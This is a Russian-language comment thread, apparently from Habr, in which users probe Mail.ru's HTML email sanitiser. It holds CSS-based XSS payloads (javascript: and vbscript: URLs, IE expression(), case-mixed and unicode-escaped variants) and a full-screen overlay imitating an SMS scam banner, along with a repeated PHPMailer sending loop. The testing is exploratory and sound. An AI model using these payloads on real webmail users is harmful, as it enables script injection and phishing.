Comments 19
Нет почты на mail.ru, по этому не могу проверить. Что будет если
Ведь все стили проходят, если я правильно понял?
<b style="display:block;position:absolute;left:0;top:0;width:100%;height:100%;background-color:red;font-size:36px;">Отправьте SMS на короткий номер...</b>
Ведь все стили проходят, если я правильно понял?
Вот результат:
Да, positon: absolute, и всё что с ним связано не пропускает.
<b style="display:block;;width:100%;height:100%;background-color:red;font-size:36px;" id="mailru-webagent-gen-43">Отправьте SMS на короткий номер...</b>Да, positon: absolute, и всё что с ним связано не пропускает.
UFO just landed and posted this here
<div background="http://***/templates/default/images/background.png" style="min-height:100px;background-color:#e1e1e4;background:url('http://***/templates/default/images/background.png') 50% 50% fixed no-repeat;color:#fff;font-family:Calibri;font-size:14px;line-height:1.22">Это со страницы письма. Тема у меня стоит.
У кого есть IE6 и почта на mail.ru пробуем еще так:
Или так: (должно работать и в IE7)
<b style="background-image:url(javascript:alert('HabraHabr'))">Ха-ха-ха!</b>
Или так: (должно работать и в IE7)
<b style="width:expression(alert('HabraHabr'));">Ха-ха!!!</b>
В IETester, режим IE6, под письмом:
ВНИМАНИЕ!
Данное письмо содержит потенциально опасный HTML-код, заблокированный системой безопасности.
Возможно, оно отображается неправильно.
ВНИМАНИЕ!
Данное письмо содержит потенциально опасный HTML-код, заблокированный системой безопасности.
Возможно, оно отображается неправильно.
javascript:*** не пропускает система безопасности.
OK, пробуем так:
Или так:
Прошу прощения, что засоряю комментарии к топику.
<b style="background-image:url(JaVaScRiPt:AlErT('Habr'))">qwerty</b>
Или так:
<b style="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">test</b>
Прошу прощения, что засоряю комментарии к топику.
Выложите скрипт, давайте пошерстим интересные варианты, ибо особенность mail.ru не может не радовать с точки зрения возможных косяков.
Скрипт простейший. Я использую PHPMailer, просто отправляю через него письмо. Что-то вроде этого:
$users = array(...);
foreach($emails as $email)
{
try{
$mail = new PHPMailer(true);
$mail->AddAddress($email);
$mail->SetFrom('me@me.org', 'I am');
$mail->Subject = $title;
$mail->MsgHTML(file_get_contents('mail.html'));
$mail->CharSet = 'utf-8';
$mail->IsHTML(true);
$mail->Send();
}catch(Exception $e){}
}
Извиняюсь)
$users = array(...);
foreach($emails as $email)
{
try{
$mail = new PHPMailer(true);
$mail->AddAddress($email);
$mail->SetFrom('me@me.org', 'I am');
$mail->Subject = $title;
$mail->MsgHTML(file_get_contents('mail.html'));
$mail->CharSet = 'utf-8';
$mail->IsHTML(true);
$mail->Send();
}catch(Exception $e){}
}
$users = array(...);
foreach($emails as $email)
{
try{
$mail = new PHPMailer(true);
$mail->AddAddress($email);
$mail->SetFrom('me@me.org', 'I am');
$mail->Subject = $title;
$mail->MsgHTML(file_get_contents('mail.html'));
$mail->CharSet = 'utf-8';
$mail->IsHTML(true);
$mail->Send();
}catch(Exception $e){}
}
Ах да, чуть не забыл!
Не уверен, что будет работать, но попробовать стоит:
vbscript же есть :-)Не уверен, что будет работать, но попробовать стоит:
<b style="background-image:url(vbscript:msgbox('HabraHabr'))">Ха-ха-ха!</b>
В Mail.ru вырезаются тег
<style>, атрибут class и атрибуты событий (onclick, onload и т.д.). Из атрибута style вырезаются все правила, связанные с позиционированием. К тому же у блока, в котором отображается тело письма, применено свойство overflow, поэтому «выйти» за пределы контейнера и перекрыть элементы интерфейся вряд ли получится.
Sign up to leave a comment.
Особенности обработки HTML-писем